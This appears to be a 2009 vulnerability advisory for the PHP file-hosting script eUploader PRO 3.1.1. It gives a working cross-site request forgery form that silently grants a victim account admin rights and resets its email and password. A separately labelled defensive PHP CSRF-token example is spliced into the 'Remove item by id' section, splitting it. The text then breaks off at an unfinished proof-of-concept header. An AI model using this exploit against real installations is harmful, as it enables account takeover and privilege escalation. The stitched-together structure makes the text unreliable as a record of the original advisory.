[#-----------------------------------------------------------------------------------------------#]
[#] Title: eUploader PRO 3.1.1 (XSRF/XSS) Multiple Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 16. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: eUploader PRO
[#] Version: 3.1.1
[#] Platform: PHP
[#] Link: http://www.euploaderpro.com/
[#] Price: ~70 USD
[#] Vulnerability: Permanent XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

Word or two: I've tested version 3.1.1 but I'm sure that other
versions are vulnerable to the following exploits.

[#]Content
|--Edit user settings (Add admin privilege)
|--Remove item by id
|--Edit appearance - Permanent XSS

[*]Edit user settings (Add admin privilege)

The eUploader PRO script has no cross-site request forgery
protection, so a forged request can edit any user's profile: grant
regular or master admin privileges, or change the email address and
password. The only thing required is the ID of the user to edit.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/admin.php?page=user&id=[ID]" method="post">
<input type="hidden" name="id" value="[ID]">
<input type="hidden" name="admin_access" value="2">
<input type="hidden" name="email" value="my@email.com">
<input type="hidden" name="pass" value="hacked">
<input type="hidden" name="pass2" value="hacked">
<input type="submit" name="edit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[-]Remove item by id

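
As an added defensive example that is not part of this advisory or of eUploader PRO's own code, the synchronizer-token check that the admin.php?page=user handler is missing; the function names, the csrf_token field and the handler layout are assumptions, only the id, admin_access, email and edit fields come from the exploit above:

```php
<?php
// Added example (not eUploader PRO's code): a per-session CSRF token that the
// user-edit handler verifies before it touches admin_access, email or pass.
session_start();

// Create the session token on first use and reuse it for the rest of the session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when a session token exists, the POST carries a string token, and
// the two match; hash_equals() keeps the comparison constant-time.
function csrf_valid(array $post): bool
{
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    if (!is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $post['csrf_token']);
}

// Edit-user handler (assumed shape): a POST from a page on another origin has no
// way to read the session token, so it fails here before any field is updated.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit'])) {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... the application's existing validation and user update go here ...
}

$userId = (int) ($_GET['id'] ?? 0);
?>
<!-- The legitimate form carries the token as a hidden field. -->
<form action="admin.php?page=user&id=<?= $userId ?>" method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="id" value="<?= $userId ?>">
  <label>Admin access <input type="text" name="admin_access"></label>
  <label>Email <input type="email" name="email"></label>
  <input type="submit" name="edit" value="Submit">
</form>
```

The token check is independent of whether the caller is logged in as admin; the existing session and privilege checks still have to run before the update.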
This will remove an uploaded file by its id.

[POC--------------------------------------------------------------------------------------